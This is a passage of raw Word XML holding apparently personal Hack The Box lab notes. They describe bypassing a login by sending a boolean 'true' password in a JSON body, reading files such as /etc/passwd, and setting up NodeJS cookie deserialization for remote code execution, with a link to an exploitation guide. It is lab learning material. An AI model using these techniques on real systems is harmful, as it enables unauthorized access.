    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003782">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003783">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We were presented with a simple login page, and there seemed to be no working attack vectors. But, we noticed that every time we were logging in (as seen from Burpsuite or the network tab in the Inspection tool), it was sending a GET request to /api/login instead of refreshing the page. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003784">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003785">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2133600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="452" name="image446.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image446.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1182"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="213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86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003787">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we tried changing the GET request to a POST request (by right clicking and selecting "Change request method", but it didn't allow for that. However, the good thing about this is that we moved the password argument and value to the request body (bottom of the http request). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003788">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003789">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we manually changed the word POST to GET and kept the password in the request body. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2451100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="462" name="image449.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image449.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1183"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="245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8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This time, we get an error that the password field is not found. For a GET request, it makes sense</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for the endpoint not to process data in the request body. But, let's try to modify the Content-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000378F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type header to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">application/json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and modify the data format to JSON, to match the format of</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003790">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the response data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003792">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003793">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, instead of putting in a string as expected, we will put in a boolean value that might bypass some type of authentication! So, we set the password to be true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003794">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003795">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2540000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="81" name="image99.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image99.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1184"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="254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96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003797">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And when we send this request, it works!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003798">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003799">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5g78begcz6qc" w:id="507"/>
      <w:bookmarkEnd w:id="507"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hex Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Pilgrimage HTB deals with using an exploit to read files (ex. /etc/passwd), but then we get the information back in hex data. </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Later on, we actually get some SQLLite database in hex data and the whole write up teaches us how to properly handle it. We had to use a simple python script (like 4 lines). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000379F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wuqkun3vd8e2" w:id="508"/>
      <w:bookmarkEnd w:id="508"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Building a serialized payload for code execution through NodeJS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Celestial HTB, we had a very simple but hard box. It had to do with decoding a cookie from Base64, seeing that it's a JSON, and exploiting a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NodeJS deserialization vulnerability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the cookie. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Serialization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the process of converting a data structure or object into a format that can be easily stored or transmitted and later reconstructed. This format is typically a byte stream or a text-based format like JSON or XML. The opposite process, reconstructing the original object from the serialized format, is called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deserialization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Viewing the NodeJS server in a browser presents a 404, however after refreshing the page,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">some text is displayed. Looking at cookies reveals a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">profile </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">entry, which is a base64-encoded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON string. Attempting to change the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">num </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">value to an unquoted string will cause an</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> error which reveals some key information</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And when we play around with the JSON, and change the "num" value to a valid number, the website updates and uses that number. So we know that there is definitely some serialization going on from the cookie to the code on the website that is used to display the text. We can try and exploit this. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037AB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="143" name="image151.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image151.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1185"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="151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AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The username is sun and the data appears to be unserialized. A </w:t>
      </w:r>
      <w:hyperlink r:id="rId1186">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">quick search finds several</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId1187">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">guides</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on building a serialized payload for code execution through NodeJS. In this case, an exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function can be passed as the username and it will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="788"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a guide: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1188">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037B2">
      <w:pPr>
        <w:rPr>
